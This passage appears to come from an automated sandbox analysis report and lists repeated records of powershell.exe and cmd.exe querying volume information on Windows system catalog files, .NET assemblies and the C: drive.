                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
